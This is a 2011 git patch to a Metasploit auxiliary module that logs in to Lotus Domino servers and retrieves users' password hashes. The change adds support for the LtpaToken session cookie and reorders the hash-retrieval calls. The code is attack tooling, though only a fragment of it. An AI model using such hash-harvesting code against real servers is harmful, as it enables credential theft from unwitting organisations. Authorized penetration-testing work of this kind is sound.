From aea8192c7f1a85474f5898d3f080436be706c471 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 23 Feb 2011 21:47:52 +0000 Subject: [PATCH] apply patch from Spencer McIntyre for newer Lotus versions with a different cookie name, thanks\! git-svn-id: file:///home/svn/framework3/trunk@11812 4d416f70-5f16-0410-b530-b9f4589650da --- .../auxiliary/scanner/lotus/lotus_domino_hashes.rb | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 57a729aad3..e7d14a6c53 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -93,16 +93,15 @@ class Metasploit3 < Msf::Auxiliary if (res and res.code == 302 ) if res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/DomAuthSessId=(.*);(.*)/i) cookie = "DomAuthSessId=#{$1}" - - print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL authentication for '#{user}'") - print_status("http://#{vhost}:#{rport} - Lotus Domino - Getting password hashs") - get_views(cookie,$uri) - + elsif res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/LtpaToken=(.*);(.*)/i) + cookie = "LtpaToken=#{$1}" else print_error("http://#{vhost}:#{rport} - Lotus Domino - Unrecognized 302 response") return :abort - end + print_good("http://#{vhost}:#{rport} - Lotus Domino - SUCCESSFUL authentication for '#{user}'") + print_status("http://#{vhost}:#{rport} - Lotus Domino - Getting password hashs") + get_views(cookie,$uri) elsif (res and res.body.to_s =~ /names.nsf\?Login/) print_error("http://#{vhost}:#{rport} - Lotus Domino - Authentication error: failed to login as '#{user}'")